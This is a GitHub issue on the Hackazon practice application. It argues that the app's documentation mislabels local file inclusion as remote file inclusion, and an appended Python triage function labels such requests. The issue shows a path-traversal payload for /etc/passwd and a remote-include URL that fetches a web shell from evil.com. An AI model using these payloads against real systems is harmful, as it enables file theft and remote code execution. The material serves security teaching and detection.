
Vulnerability Misclassified

Open jhaddix opened this issue 7 years ago • 0 comments

In your practice application you have misclassified LFI as RFI.

on https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md

you say:

Remote File Include:

RFI Injection allows to use an app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:

http://hackazon.dev/account/help_articles?page=add_product_to_cart

Vulnerability can be used as such:

http://hackazon.dev/account/help_articles?page=/etc/passwd%00

This is pulling a local file, and the vuln present is LFI not RFI.

RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:

http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt

the value of which would be a web shell like so:

jhaddix, Oct 28 '16 22:10
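The LFI/RFI distinction drawn in this issue, as an added example that is not part of the original issue or of Hackazon's code: a Python triage function that labels the `page` value of a help_articles request. It assumes legitimate help pages are lowercase slugs such as add_product_to_cart; the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate help pages are plain slugs like add_product_to_cart.
SLUG = re.compile(r"[a-z0-9_]+")
# Network schemes: the include target would be fetched from another host.
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)
# Absolute POSIX/Windows paths: the include target is on the server itself.
LOCAL_PATH = re.compile(r"^(?:/|\\|[a-z]:[\\/])", re.I)

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so the checks see the effective value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_page_param(url, param="page"):
    """Label the include target in `url` as 'ok', 'lfi', 'rfi' or 'invalid'."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param)
    if not values:
        return "invalid"
    value = decode_fully(values[-1])
    if SLUG.fullmatch(value):
        return "ok"
    if REMOTE.match(value):
        return "rfi"   # remote content would be pulled in and parsed
    if "\x00" in value or ".." in value or LOCAL_PATH.match(value):
        return "lfi"   # a file already on the server would be read
    return "invalid"   # not a slug: reject, but not an include attempt we label

def triage(urls):
    """Map each request URL to its label."""
    return {u: classify_page_param(u) for u in urls}

# The three request URLs quoted in the issue above.
SAMPLE_REQUESTS = (
    "http://hackazon.dev/account/help_articles?page=add_product_to_cart",
    "http://hackazon.dev/account/help_articles?page=/etc/passwd%00",
    "http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt",
)

if __name__ == "__main__":
    for url, label in triage(SAMPLE_REQUESTS).items():
        print(f"{label:8} {url}")
```

Anything other than `ok` should be rejected by the application; the `lfi`/`rfi` label only determines how the finding is classified and reported.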